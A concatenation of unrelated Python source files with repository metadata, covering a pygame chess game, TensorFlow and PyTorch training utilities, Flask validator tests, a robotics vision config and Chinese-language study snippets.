d346045a2a702b4b5d37883e341ba6820c6a9156 | 11,851 | py | Python | chess/__main__.py | quadratic-bit/pygame-chess | 83e8329a0e294008191770e7ddace52572bf7460 | [
"MIT"
] | 3 | 2021-12-22T08:28:21.000Z | 2022-01-05T03:44:50.000Z | chess/__main__.py | quadratic-bit/pygame-chess | 83e8329a0e294008191770e7ddace52572bf7460 | [
"MIT"
] | null | null | null | chess/__main__.py | quadratic-bit/pygame-chess | 83e8329a0e294008191770e7ddace52572bf7460 | [
"MIT"
] | null | null | null | from sys import exit
from typing import Optional, Final
import pygame
from rich.traceback import install
from chess.board import Chessboard, Move, PieceType, PieceColour
from chess.bot import ChessBot
from chess.const import GameState
from chess.utils import load_image, load_sound, load_font
install(show_locals=True)
def terminate() -> None:
pygame.quit()
exit(0)
def main():
# Game setup
# Pygame stuff
pygame.init()
SCREEN_W, SCREEN_H = SCREEN_SHAPE = 1200, 800 # type: Final
screen = pygame.display.set_mode(SCREEN_SHAPE)
pygame.display.set_caption("Chess")
# Colours
colour_bg = pygame.Color("#443742")
colour_contrast_bg = pygame.Color("#8D80AD")
# FPS handler
clock = pygame.time.Clock()
FPS = 60
# Creating a board using FEN
# Start position: rnbqkbnr/pppppppp/8/8/8/8/PPPPPPPP/RNBQKBNR w KQkq - 0 1
# Advanced: 1r1q3r/3b2bk/p5pp/2QB4/5p2/P5nP/1PP5/2KRR3 b - - 6 12
# Pawn promotion: 8/6P1/2Q5/4p3/3qP3/5Q2/1q3PK1/qk6 w - - 36 73
# Checkmate: 3rkbnr/1p1bp3/1q1p3p/p5p1/3n4/PPR2Q2/5PPP/6K1 w - - 1 2
fen_game_state = "rnbqkbnr/pppppppp/8/8/8/8/PPPPPPPP/RNBQKBNR w KQkq - 0 1"
board = Chessboard.from_fen(fen_game_state)
# Sounds
sound_common = load_sound("common.ogg")
sound_check = load_sound("check.ogg")
# Fonts
font_header = load_font("ubuntumono/UbuntuMono-R.ttf", 90)
font_option = load_font("ubuntumono/UbuntuMono-B.ttf", 55)
# Defining variables to interact with player
grabbing: Optional[tuple[int, int]] = None
hovering = False
# Render Flag
last_move: Optional[Move] = None
# Defining game loop functions
def start_screen() -> None:
"""Start screen"""
nonlocal screen, font_header, font_option
bg_start_img = pygame.transform.scale(load_image('bg_start.png'), SCREEN_SHAPE)
title = font_header.render("Шахматы", True, pygame.Color("white"))
option = font_option.render("Нажмите любую клавишу...", True, pygame.Color("white"))
screen.blit(bg_start_img, (0, 0))
screen.blit(title, (420, 200))
screen.blit(option, (270, 650))
pygame.display.flip()
while True:
for event_ in pygame.event.get():
if event_.type == pygame.QUIT:
terminate()
elif event_.type == pygame.KEYDOWN or event_.type == pygame.MOUSEBUTTONDOWN:
return
clock.tick(FPS)
def choose_game_mode_screen() -> bool:
"""Game mode screen ( True if vs AI, False otherwise )"""
nonlocal screen
screen.fill(colour_bg)
pygame.draw.rect(screen, colour_contrast_bg, (300, 352, 600, 96))
pygame.draw.rect(screen, colour_contrast_bg, (340, 576, 520, 96))
button_vs_ai = font_header.render("Выберите режим игры", True, "white")
button_vs_player = font_option.render("Против компьютера", True, "black")
screen.blit(button_vs_ai, (170, 131))
screen.blit(button_vs_player, (400, 368))
screen.blit(font_option.render("Против игрока", True, "black"), (460, 593))
# Icons by Font Awesome!
# License: https://fontawesome.com/license/free
screen.blit(pygame.transform.scale(load_image('desktop-solid.png'), (80, 80)), (308, 360))
screen.blit(pygame.transform.scale(load_image('chess-solid.png'), (80, 80)), (348, 584))
pygame.display.flip()
button_rects = [pygame.Rect(300, 352, 600, 96), pygame.Rect(340, 576, 520, 96)]
def is_colliding(m_pos: tuple[int, int]) -> bool:
return any(map(lambda b: b.x < m_pos[0] < b.x + b.w and b.y < m_pos[1] < b.y + b.h, button_rects))
while True:
for event_ in pygame.event.get():
if event_.type == pygame.QUIT:
terminate()
elif event_.type == pygame.MOUSEBUTTONDOWN:
if is_colliding(event_.pos):
if button_rects[0].x < event_.pos[0] < button_rects[0].x + button_rects[0].w and \
button_rects[0].y < event_.pos[1] < button_rects[0].y + button_rects[0].h:
return True
return False
elif event_.type == pygame.MOUSEMOTION:
if is_colliding(event_.pos):
pygame.mouse.set_cursor(pygame.SYSTEM_CURSOR_HAND)
else:
pygame.mouse.set_cursor(pygame.SYSTEM_CURSOR_ARROW)
clock.tick(FPS)
def end_screen(state: GameState, board_state: tuple) -> None:
board.render(screen, last_move, game_info=board_state)
scaffold = pygame.Surface(SCREEN_SHAPE)
pygame.draw.rect(scaffold, pygame.Color("black"),
(0, 0, SCREEN_W, SCREEN_H))
scaffold.set_alpha(0)
screen.blit(scaffold, (0, 0))
end_font = load_font("ubuntumono/UbuntuMono-R.ttf", 90)
end_font_colour = pygame.Color("white")
mate = end_font.render(
"Мат!"
if state == GameState.Checkmate
else "Пат!", True, end_font_colour)
score = end_font.render(
"0-1"
if board.active_colour == PieceColour.White
else "1-0", True, end_font_colour)
bg = pygame.Surface((600, 400))
bg.fill(pygame.Color("black"))
bg.set_alpha(180)
mate.set_alpha(255)
score.set_alpha(255)
mate_rect = mate.get_rect()
bg_rect = bg.get_rect()
score_rect = score.get_rect()
mdx = (bg_rect.w - mate_rect.w) // 2
mdy = (bg_rect.h - mate_rect.h) // 3
sdx = (bg_rect.w - score_rect.w) // 2
sdy = (bg_rect.h - score_rect.h) // 1.5
screen.blit(bg, (300, 200))
screen.blit(mate, (300 + mdx, 200 + mdy))
screen.blit(score, (300 + sdx, 200 + sdy))
pygame.display.flip()
pygame.mouse.set_cursor(pygame.SYSTEM_CURSOR_ARROW)
while True:
for e in pygame.event.get():
if e.type == pygame.QUIT:
terminate()
elif e.type == pygame.KEYDOWN or e.type == pygame.MOUSEBUTTONDOWN:
return
def toggle_state(board_state: tuple) -> bool:
"""Check and toggle game state (for endgames especially)"""
state = board.toggle_state()
if state == GameState.Continue:
return False
else:
end_screen(state, board_state)
return True
def game_loop(vs_ai: bool) -> None:
"""Main game loop"""
nonlocal grabbing, hovering, last_move
# My linter can't handle unsigned variables like these
bot = last_move_uncaught = None
if vs_ai:
# Initialising the AI
bot = ChessBot()
# Bot Flag
last_move_uncaught = False
# Toggle flag
board_info: Optional[tuple] = None
# Initial rendering
board.render(screen)
pygame.display.flip()
# Starting main loop
while True:
for event in pygame.event.get():
# Quitting game
if event.type == pygame.QUIT:
terminate()
# LMB while hovering above a piece (grab a piece)
if event.type == pygame.MOUSEBUTTONDOWN and \
event.button == pygame.BUTTON_LEFT and hovering:
# Find grabbed piece
grabbing = (event.pos[0] // 100, event.pos[1] // 100)
if board.at(*grabbing).Colour != board.active_colour:
# Wrong colour!
grabbing = None
else:
# Render a board with that grabbed piece being grabbed
board.render(screen, last_move, grabbing, event.pos,
game_info=board_info)
pygame.display.flip()
# Releasing LMB
elif event.type == pygame.MOUSEBUTTONUP and \
event.button == pygame.BUTTON_LEFT:
# Get position where player dropped the piece
released = (event.pos[0] // 100, event.pos[1] // 100)
if pygame.mouse.get_focused() and grabbing is not None and \
released != grabbing and event.pos[0] <= 800 and \
event.pos[1] <= 800:
# Trying to make move
x, y = grabbing[0] + grabbing[1] * 8, \
released[0] + released[1] * 8
move = Move(x, y, board.at(*released))
# If we can make move -> let the bot make the next one
move = board.can_make(move)
if move is not None:
board.make_move(move)
if board.king_is_safe(board.passive_colour):
sound_common.play()
else:
sound_check.play()
last_move = move
last_move_uncaught = True
if toggle_state(board_info):
return
# Stop grabbing
grabbing = None
# Rendering board after releasing piece
board.render(screen, last_move, game_info=board_info)
pygame.display.flip()
if vs_ai and last_move_uncaught is not None and bot is not None:
# Bot's turn
if last_move is not None and last_move_uncaught:
last_move, board_info = bot.get_move(board, last_move)
board.make_move(last_move)
if board.king_is_safe(board.passive_colour):
sound_common.play()
else:
sound_check.play()
if toggle_state(board_info):
return
# Updating flag
last_move_uncaught = False
# Rendering board after bot's turn
board.render(screen, last_move, game_info=board_info)
pygame.display.flip()
# Handling mouse and cursor
if pygame.mouse.get_focused():
pos = pygame.mouse.get_pos()
# Changing cursor state
if board.at(pos[0] // 100, pos[1] // 100).Type != PieceType.Empty:
pygame.mouse.set_cursor(pygame.SYSTEM_CURSOR_HAND)
hovering = True
else:
pygame.mouse.set_cursor(pygame.SYSTEM_CURSOR_ARROW)
hovering = False
# Rendering board and a hovering piece
if grabbing:
board.render(screen, last_move, grabbing, pos,
game_info=board_info)
pygame.display.flip()
else:
# Mouse is out of window -> stop grabbing
grabbing = None
board.render(screen, last_move, game_info=board_info)
pygame.display.flip()
hovering = False
clock.tick(FPS)
# Starting the game
start_screen()
while True:
# Main loop
game_loop(choose_game_mode_screen())
# Resetting the board
board = Chessboard.from_fen(fen_game_state)
if __name__ == "__main__":
main()
| 42.938406 | 110 | 0.537845 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,915 | 0.160547 |
d346329c9ae09e1ba6b9cdabc40a15e9d8362a75 | 532 | py | Python | rfb_utils/scenegraph_utils.py | N500/RenderManForBlender | 76de176322a130b657a898fef7123168677f67eb | [
"MIT"
] | 5 | 2018-01-13T09:37:35.000Z | 2021-07-19T08:55:28.000Z | rfb_utils/scenegraph_utils.py | N500/RenderManForBlender | 76de176322a130b657a898fef7123168677f67eb | [
"MIT"
] | 3 | 2018-01-17T22:32:24.000Z | 2018-01-22T13:36:31.000Z | rfb_utils/scenegraph_utils.py | N500/RenderManForBlender | 76de176322a130b657a898fef7123168677f67eb | [
"MIT"
] | 2 | 2020-02-01T15:37:09.000Z | 2020-06-16T16:40:17.000Z | def set_material(sg_node, sg_material_node):
'''Sets the material on a scenegraph group node and sets the materialid
user attribute at the same time.
Arguments:
sg_node (RixSGGroup) - scene graph group node to attach the material.
sg_material_node (RixSGMaterial) - the scene graph material node
'''
sg_node.SetMaterial(sg_material_node)
attrs = sg_node.GetAttributes()
attrs.SetString('user:__materialid', sg_material_node.GetIdentifier().CStr())
sg_node.SetAttributes(attrs) | 38 | 81 | 0.725564 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 302 | 0.567669 |
d34829b6ba82dd4f1000c257500d4c5fd0963053 | 1,766 | py | Python | models/attention_ensemble_diff_layers.py | tlatkowski/attention-ensemble-gene-expression | 7ef2361ddb758f6af7d3e948f2ae793363909f7d | [
"MIT"
] | null | null | null | models/attention_ensemble_diff_layers.py | tlatkowski/attention-ensemble-gene-expression | 7ef2361ddb758f6af7d3e948f2ae793363909f7d | [
"MIT"
] | 7 | 2017-11-03T12:08:14.000Z | 2017-12-04T18:48:41.000Z | models/attention_ensemble_diff_layers.py | tlatkowski/attention-ensemble-gene-expression | 7ef2361ddb758f6af7d3e948f2ae793363909f7d | [
"MIT"
] | null | null | null | import tensorflow as tf
from layers.attention_layers import attention_layer
from layers.common_layers import init_inputs
from layers.feed_forward_layers import feed_forward_diff_features, feed_forward_diff_layers
from utils.hyperparams import Hyperparams as hp
class AttentionBasedEnsembleNets:
def __init__(self, selection_methods, num_features, learning_rate=0.01):
with tf.name_scope('input'):
self.nn_inputs = init_inputs(num_features, selection_methods)
self.labels = tf.placeholder(dtype=tf.float32, shape=[None, 1], name='labels')
with tf.name_scope('ff'):
nets = {'fisher': [200, 50], 'ttest': [200, 50], 'corr': [200, 50], 'random': [200, 50]}
feed_forward = feed_forward_diff_layers(self.nn_inputs, nets)
with tf.name_scope('output'):
out = attention_layer(feed_forward, attention_size=50)
logits = tf.layers.dense(out, units=1)
sig = tf.nn.sigmoid(logits)
predictions = tf.round(sig)
with tf.name_scope('train'):
self.loss = tf.losses.sigmoid_cross_entropy(
multi_class_labels=self.labels, logits=logits)
self.opt = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(self.loss)
with tf.name_scope('summaries'):
self.acc = tf.reduce_mean((predictions * self.labels) + ((1 - predictions) * (1 - self.labels)))
self.precision, precision_op = tf.metrics.precision(self.labels, predictions)
# summaries
tf.summary.scalar('loss', self.loss)
tf.summary.scalar('accuracy', self.acc)
tf.summary.scalar('precision_op', precision_op)
self.merged_summary_op = tf.summary.merge_all()
| 45.282051 | 108 | 0.663647 | 1,501 | 0.849943 | 0 | 0 | 0 | 0 | 0 | 0 | 115 | 0.065119 |
d3498dff4622ae6084c3e6cc4ffe4f73a4a1af00 | 1,965 | py | Python | webapps/ivs/test/test_validators_views.py | mongodb-labs/mongo-web-shell | b306390e26888f0a0bf77cf99528e4e6bc41f0a8 | [
"ECL-2.0",
"Apache-2.0"
] | 22 | 2015-09-29T10:23:23.000Z | 2022-01-26T09:50:11.000Z | webapps/ivs/test/test_validators_views.py | pilliq/mongo-web-shell | 03cbc8815982d0eb160ec239bf3a36c7a2e08dde | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | webapps/ivs/test/test_validators_views.py | pilliq/mongo-web-shell | 03cbc8815982d0eb160ec239bf3a36c7a2e08dde | [
"ECL-2.0",
"Apache-2.0"
] | 10 | 2015-11-26T16:08:30.000Z | 2021-03-03T15:11:23.000Z | # Copyright 2013 10gen Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import types
import mock
import sys
from tests import MongoWSTestCase
from mongows.validators.ValidationTest import ValidationTest
class ValidatorsTestCase(MongoWSTestCase):
def test_imports_and_runs_the_specified_file(self):
# Create module test_script in scripts
test_script = types.ModuleType('test_script')
run_mock = mock.MagicMock()
class ValidationTestCase(ValidationTest):
def run(self):
run_mock(self.res_id)
return 'ok', 200
test_script.__dict__.update({'ValidationTestCase': ValidationTestCase})
sys.modules['mongows.validators.scripts.test_script'] = test_script
response = self.app.post('/validate/test_script',
data={'res_id': 'foo'})
self.assertEqual(response.data, 'ok')
self.assertEqual(response.status_code, 200)
run_mock.assert_called_once_with('foo')
del sys.modules['mongows.validators.scripts.test_script']
def test_returns_404_when_accessing_nonexistent_script(self):
response = self.app.post('/validate/test_script',
data={'res_id': 'foo'})
expected_message = 'Unknown validation script test_script'
self.assertEqual(response.data, expected_message)
self.assertEqual(response.status_code, 404)
| 38.529412 | 79 | 0.690585 | 1,230 | 0.625954 | 0 | 0 | 0 | 0 | 0 | 0 | 862 | 0.438677 |
d349bccc9afad8b3db6c0df14da872b974c7b94e | 9,370 | py | Python | utils/train.py | fbuchert/mixmatch-pytorch | 5dc989432bf26561b3c40ea03b319d12c7ace20b | [
"MIT"
] | null | null | null | utils/train.py | fbuchert/mixmatch-pytorch | 5dc989432bf26561b3c40ea03b319d12c7ace20b | [
"MIT"
] | null | null | null | utils/train.py | fbuchert/mixmatch-pytorch | 5dc989432bf26561b3c40ea03b319d12c7ace20b | [
"MIT"
] | null | null | null | import math
from itertools import product
from typing import Tuple, List, Optional, Union
import numpy as np
import torch
import torch.nn as nn
import torch.nn.init as init
class EMA:
"""
Class that keeps track of exponential moving average of model parameters of a particular model.
Also see https://github.com/chrischute/squad/blob/master/util.py#L174-L220.
"""
def __init__(self, model: torch.nn.Module, decay: float):
"""
Initialization method for the EMA class.
Parameters
----------
model: torch.nn.Module
Torch model for which the EMA instance is used to track the exponential moving average of parameter values
decay: float
Decay rate used for exponential moving average of parameters calculation:
ema_t = decay * p_t + (1-decay) * ema_(t-1)
"""
self.decay = decay
self.shadow = {}
self.original = {}
# Register model parameters
for name, param in model.named_parameters():
if param.requires_grad:
self.shadow[name] = param.clone().detach()
def __call__(self, model):
"""
Implements call method of EMA class
Parameters
----------
model: torch.nn.Module
Current model based on which the EMA parameters are updated
"""
with torch.no_grad():
for name, param in model.named_parameters():
if param.requires_grad:
assert name in self.shadow
new_average = (1.0 - self.decay) * param + self.decay * self.shadow[
name
]
self.shadow[name] = new_average
def assign(self, model: torch.nn.Module):
"""
This method assigns the parameter EMAs saved in self.shadow to the given model. The current parameter values
of the model are saved to self.original. These original parameters can be restored using self.resume.
Parameters
----------
model: torch.nn.Module
Model to which the current parameter EMAs are assigned.
"""
for name, param in model.named_parameters():
if param.requires_grad:
self.original[name] = param.clone()
param.data.copy_(self.shadow[name].data)
def resume(self, model: torch.nn.Module):
"""
This method restores the parameters saved in self.original to the given model. It is usually called after
the `assign` method.
Parameters
----------
model: torch.nn.Module
Torch model to which the original parameters are restored
"""
for name, param in model.named_parameters():
if param.requires_grad:
param.data.copy_(self.original[name].data)
class ModelWrapper:
"""
ModelWrapper which can be used to extract outputs of intermediate layer of a network.
"""
def __init__(self, task_model: nn.Module, to_extract: Tuple):
"""
Initializes a model wrapper for the specified task model and layer names to extract.
Parameters
----------
task_model: torch.nn.Module
Torch model to which the original parameters are restored
to_extract: Tuple
Tuple that holds names of layers for which intermediate results should be extracted and returned,
e.g. to_extract=(`avgpool`, `fc`) to extract intermediate results after the avgpool layer and last fully
connected layer in a ResNet for example.
"""
self.task_model = task_model
self.to_extract = to_extract
def __call__(self, x: torch.Tensor):
"""
The __call__ method iterates through all modules of the provided `task_model` separately. It extracts and
returns the intermediate results at layers specified by to_extract
Parameters
----------
x: torch.Tensor
Batch of samples, e.g. images, which are passed through the network and for which specified intermediate
results are extracted
Returns
----------
results: Optional[torch.Tensor, List[torch.Tensor]]
Results of forward pass of input batch through the given task model. If len(to_extract) is 1, only the
single result tensor is returned. Otherwise, a list of tensors is returned, which holds the intermediate
results of specified layers in the order of occurrence in the network.
"""
results = []
for name, child in self.task_model.named_children():
x = child(x)
if name == "avgpool":
x = torch.flatten(x, 1)
if name in self.to_extract:
results.append(x)
return results[-1] if len(results) == 1 else results
def train(self):
self.task_model.train()
def eval(self):
self.task_model.eval()
def cuda(self):
self.task_model.cuda()
def to(self, device: Union[str, torch.device]):
self.task_model.to(device)
def get_embedding_dim(self):
last_layer = list(self.task_model.modules())[-1]
return last_layer.in_features
def model_init(m: torch.nn.Module):
"""
Method that initializes torch modules depending on their type:
- Convolutional Layers: Xavier Uniform Initialization
- BatchNorm Layers: Standard initialization
- Fully connected / linear layers: Xavier Normal Initialization#
Parameters
----------
m: torch.nn.Module
Torch module which to be initialized. The specific initialization used depends on the type of module.
"""
classname = m.__class__.__name__
if classname.find("Conv") != -1:
init.xavier_uniform_(m.weight, gain=math.sqrt(2))
if m.bias is not None:
init.constant_(m.bias, 0)
elif classname.find("BatchNorm") != -1:
init.constant_(m.weight, 1)
init.constant_(m.bias, 0)
elif classname.find("Linear") != -1:
init.xavier_normal_(m.weight, gain=math.sqrt(2))
if m.bias is not None:
init.constant_(m.bias, 0)
def wd_check(wd_tuple: Tuple, name: str):
"""
Method that checks if parameter name matches the key words in wd_tuple. This check is used to filter certain
types of parameters independent of the layer, which it belongs to, e.g. `conv1.weight`.
Parameters
----------
wd_tuple: Tuple
Tuple which contains the phrases which are checked for, e.g. (`conv`, `weight`) or (`fc`, `weight`)
name: str
Name of parameter as saved in state dict, e.g. `conv1.weight`
Returns
----------
wd_check: bool
Returns a bool indicating whether all strings in wd_tuple are contained in name.
"""
return all([x in name for x in wd_tuple])
def apply_wd(model: torch.nn.Module, wd: float, param_names: List = ["conv", "fc"], types: List = ["weight"]):
"""
Method that manually applies weight decay to model parameters that match the specified parameter names and types.
Parameters
----------
model: torch.nn.Module
Model to which weight decay is applied
wd: float
Float specifying weight decay. Parameters are updated to: param = (1-wd) * param
param_names: List (default: ["conv", "fc"])
Parameter names (or substring of names) for which the weight decay is applied.
types: List (default: ["weight"])
Parameter types for which weight decay is applied.
"""
with torch.no_grad():
for name, param in model.state_dict().items():
if any(
[wd_check(wd_tuple, name) for wd_tuple in product(param_names, types)]
):
param.mul_(1 - wd)
def set_bn_running_updates(model, enable: bool, bn_momentum: float = 0.001):
"""
Method that enables or disables updates of the running batch norm vars by setting the momentum parameter to 0
"""
for m in model.modules():
if isinstance(m, nn.BatchNorm2d):
m.momentum = bn_momentum if enable else 0.0
def linear_rampup(current: int, rampup_length: int):
if rampup_length == 0:
return 1.0
else:
current = np.clip(current / rampup_length, 0.0, 1.0)
return float(current)
def set_grads(model: torch.nn.Module, trainable_layers: List[str]):
"""
Method that enables or disables gradients of model parameters according to specified layers.
Parameters
----------
model: torch.nn.Module
Torch model for which parameter gradients should be set
trainable_layers: List
List of strings, i.e. layer / parameter names, for which training is enabled. For model parameters, which do not
match any pattern specified in trainable_layers, training is disable by setting requires_grad to False.
"""
def is_trainable(x, trainable_layers):
return any([(layer in x) or ('fc' in x) for layer in trainable_layers])
for p in model.parameters():
p.requires_grad = False
trainable_parameters = [n for n, p in model.named_parameters() if is_trainable(n, trainable_layers)]
for n, p in model.named_parameters():
if n in trainable_parameters:
p.requires_grad = True
| 36.745098 | 120 | 0.627215 | 5,105 | 0.544824 | 0 | 0 | 0 | 0 | 0 | 0 | 5,264 | 0.561793 |
d34a0f347fe4613cb57d033d0a6ac2ca4e0bbe81 | 2,647 | py | Python | plotting-cell-cycle.py | kbromma/DBCCode | 0315907c7e0f59d41339743fcca57716f0367f9a | [
"MIT"
] | null | null | null | plotting-cell-cycle.py | kbromma/DBCCode | 0315907c7e0f59d41339743fcca57716f0367f9a | [
"MIT"
] | null | null | null | plotting-cell-cycle.py | kbromma/DBCCode | 0315907c7e0f59d41339743fcca57716f0367f9a | [
"MIT"
] | null | null | null | import matplotlib
import matplotlib.pyplot as plt
import numpy as np
import csv
import seaborn as sns
import itertools
import pandas as pd
import scipy
from scipy.signal import savgol_filter
from scipy.signal import find_peaks_cwt
from scipy.signal import boxcar
sns.set(font_scale=1.2)
sns.set_style("white")
colors = ["#95a5a6", "amber"]
sns.set_palette(sns.color_palette())
hr_24 = np.loadtxt("MDA DTX_1 4_24hr.txt", skiprows=1)
ctl = np.loadtxt("MDA DTX_1 Ctl.txt", skiprows=1)
hr_4 = np.loadtxt("MDA DTX_1 4hr.txt", skiprows=1)
# hr_2 = np.loadtxt("MDA-DTX-#2hr.txt", skiprows=1)
hr_8 = np.loadtxt("MDA DTX 8hr.txt", skiprows=1)
dmso = np.loadtxt("MDA DTX DMSO.txt", skiprows=1)
def filterDat(data):
num = 9
ones = boxcar(num)/num
result = np.abs(np.convolve(data, ones, mode='same'))
return np.interp(result, (result.min(), result.max()), (0, 100))
def shift(data):
"""
firstIndex = 200
index = np.argmax(data)
if index < firstIndex:
data = np.insert(data, 0, np.zeros(
firstIndex-index))[:-(firstIndex-index)]
elif index > firstIndex:
data = data[index-firstIndex:]
data = np.insert(data, len(data)-1, np.zeros(index-firstIndex))
"""
# Stretch
secondIndex = 400
indexes = find_peaks_cwt(data, np.arange(1, 100))
# find max of indexes
peaks = data[indexes]
secondMax = 0
lastPeak = 0
for x in range(len(peaks)):
if peaks[x] < 95.0:
if peaks[x] > lastPeak:
lastPeak = peaks[x]
secondMax = x
secondMaxIndex = indexes[secondMax]
difference = secondIndex-secondMaxIndex
ratio = secondIndex/(secondIndex-difference)
old_x = np.linspace(0, int(len(data))-1, int(len(data)))
new_x = np.linspace(0, int(len(data))-1, int(len(data)*ratio))
new_data = np.interp(new_x, old_x, data)
return new_data, np.linspace(0, int(len(new_x))-1, int(len(new_x)))
fig, axes = plt.subplots(figsize=(8, 6))
filterData = filterDat(ctl[:, 2])
y, x = shift(filterData)
axes.plot(x, y, label="Control", color='black')
axes.fill_between(x, y, alpha=0.3)
"""filterData = filterDat(hr_4[:, 2])
y, x = shift(filterData)
axes.plot(x, y, label="4 hour")
axes.fill_between(x, y, alpha=0.3)
filterData = filterDat(hr_8[:, 2])
y, x = shift(filterData)
axes.plot(x, y, label="8 hour")
axes.fill_between(x, y, alpha=0.3)
"""
filterData = filterDat(hr_24[:, 2])
y, x = shift(filterData)
axes.plot(x, y, label="24 hour", color='maroon')
axes.fill_between(x, y, alpha=0.3)
axes.legend()
axes.set_ylabel('% of Max')
axes.set_xlabel('Fluorescence')
axes.set_xlim((0, 800))
plt.show()
| 27.863158 | 71 | 0.659615 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 846 | 0.319607 |
d34a4e09e20dab066492b8968362434dac01a5d1 | 3,349 | py | Python | config.py | sneakysnakesfrc/sneaky-vision-2019 | 7a83ece2c76c084e077bb386ac234594c3d780c5 | [
"MIT"
] | 2 | 2020-10-07T21:17:48.000Z | 2020-11-13T13:45:20.000Z | config.py | sneakysnakesfrc/sneaky-vision-2019 | 7a83ece2c76c084e077bb386ac234594c3d780c5 | [
"MIT"
] | null | null | null | config.py | sneakysnakesfrc/sneaky-vision-2019 | 7a83ece2c76c084e077bb386ac234594c3d780c5 | [
"MIT"
] | 1 | 2020-11-13T13:45:21.000Z | 2020-11-13T13:45:21.000Z | # Debug or not
DEBUG = 1
# Trackbar or not
CREATE_TRACKBARS = 1
# Display or not
DISPLAY = 1
# Image or Video, if "Video" is given as argument, program will use cv2.VideoCapture
# If "Image" argument is given the program will use cv2.imread
imageType = "Video"
# imageType = "Image"
# Image/Video source 0 or 1 for webcam or the file path of the video source such as
# "images/rocket/RocketPanelStraightDark72in.jpg" or "images/rocket/testvideo.mp4"
imageSource = 0
# Ip address
ipAddress = "10.99.99.2"
# The script to make camera arrangements
osScript = "v4l2-ctl --device /dev/video0 -c auto_exposure=1 -c exposure_auto_priority=0 -c exposure_time_absolute=20 --set-fmt-video=width=160,height=120,pixelformat=MJPG -p 15 && v4l2-ctl -d1 --get-fmt-video"
# Call OS script or not, close this in WINDOWS
callOS = 1
# NetworkTable Name
networkTableName = "visiontable"
# Camera Properties
camera = { 'HFOV' : 53.50, # 80.0, Horizontal FOV of the camera, see camera datasheet
'VFOV' : 41.41, # 64.0, Vertical FOV of the camera, see camera datasheet
'Brightness' : 1, # Brightness of the image
'Contrast' : 1000, # Contrast of the image
'HeightDiff' : 15, # Height difference between camera and target
'MountAngle' : -5, # Mounting angle of the camera need minus sign if pointing downwards
'WidthSize' : 320, # Resized image width size in pixels (image becomes square)
'HeightSize' : 240, # Resized image height size in pixels (image becomes square)
'FPS' : 15, # FPS of the camera
'AngleAcc' : 360, # 5 is normally used, you can use 360 to let the code ignore accuracy
'SetSize' : 0, # Set size of the camera with cap prop
'DoCrop' : 0, # Crop the image or don't
'DoResize' : 1, # Resize the image or don't
'CropXLow' : 0, # Lowest Point in X axis to be cropped
'CropYLow' : 125, # Lowest Point in Y axis to be cropped
'ColorSpace' : 'HSV', # Which color space to use BGR, HSV or Gray
'Gray_low' : 127, # Lower Gray value to be filtered
'Gray_high' : 255, # Higher Gray value to be filtered
'H_low' : 13, # Lower Hue value to be filtered, 55
'H_high' : 255, # Higher Hue to be filtered
'S_low' : 25, # Lower Saturation to be filtered, 97
'S_high' : 255, # Higher Saturation to be filtered
'V_low' : 24, # Lower Value to be filtered, 177
'V_high' : 255, # Higher Value to be filtered
'B_low' : 5, # Lower Blue value to be filtered
'B_high' : 95, # Higher Blue value to be filtered
'G_low' : 135, # Lower Green value to be filtered
'G_high' : 255, # Higher Green value to be filtered
'R_low' : 121, # Lower Red value to be filtered
'R_high' : 181 # Higher Red value to be filtered
}
filter = { 'MinArea' : 200, # Minimum value of area filter in pixels
'MaxArea' : 5000 # Maximum value of area filter in pixels
}
| 57.741379 | 211 | 0.582263 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,320 | 0.692744 |
d34ade69ec04997bfd82ad501ed25a0cde195b6d | 307 | py | Python | context/steps.py | NanoScaleDesign/Canparam | 987972f1593b83c3cbd8808b2722ff1b3a696eac | [
"MIT"
] | null | null | null | context/steps.py | NanoScaleDesign/Canparam | 987972f1593b83c3cbd8808b2722ff1b3a696eac | [
"MIT"
] | null | null | null | context/steps.py | NanoScaleDesign/Canparam | 987972f1593b83c3cbd8808b2722ff1b3a696eac | [
"MIT"
] | null | null | null | #! /usr/bin/env python3
"""Context files must contain a 'main' function.
The return from the main function should be the resulting text"""
def main(params):
if hasattr(params,'time'):
# 1e6 steps per ns
steps = int(params.time * 1e6)
else:
steps = 10000
return steps
| 20.466667 | 65 | 0.635179 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 161 | 0.52443 |
d34b8ae8f80579fd68134d835709ce8d49d3681c | 1,822 | py | Python | python.io/study-20180412.py | cnzht/grit | eab457a0a9b216f5a6026669095b8126bf8a9e1d | [
"MIT"
] | 1 | 2018-04-04T09:26:21.000Z | 2018-04-04T09:26:21.000Z | python.io/study-20180412.py | cnzht/grit | eab457a0a9b216f5a6026669095b8126bf8a9e1d | [
"MIT"
] | null | null | null | python.io/study-20180412.py | cnzht/grit | eab457a0a9b216f5a6026669095b8126bf8a9e1d | [
"MIT"
] | null | null | null | #-*-coding:utf-8-*-
#bodyBMI.py
#2018年4月11日 21:03:12
#打印出字符串中的某一部分
'''
import random
st = [1,1,15,1,5,8,1,5,8]
print (random.shuffle(st))
'''
'''
#利用蒙特卡洛方法计算圆周率PI
from random import random
from time import perf_counter
DATA = pow(1000,100)
hit = 0
start = perf_counter()
for i in range(1,DATA+1):
x,y = random(),random()
if pow((x**2)+(y**2),0.5)<=1:
hit+=1
PI = 4*(hit/DATA)
print("圆周率PI={}".format(PI))
print("程序运行时间={}".format(start-perf_counter()))
'''
'''
#利用函数定义计算N的阶乘
n = 10
sr = [1,2,5,23,92,14,20,1]
def fact(m=1):
global n
for i in range(1,n):
n*=i
return n//m
print(fact())
print("最大的是:{}\n最小的是:{}".format(max(sr),min(sr)))
'''
'''
#前期复习
sr = ['sa','ad']
print(''.join(sr))
'''
'''
#海龟进度条
import time
import turtle as t
t.setup(600,600,200,200)
t.pensize(12)
t.pencolor('red')
t.bk(100)
t.done()
'''
'''
try:
st = str(input())
print(st)
except:
print("error!")
else:
print("right")
finally:
print("end")
'''
'''
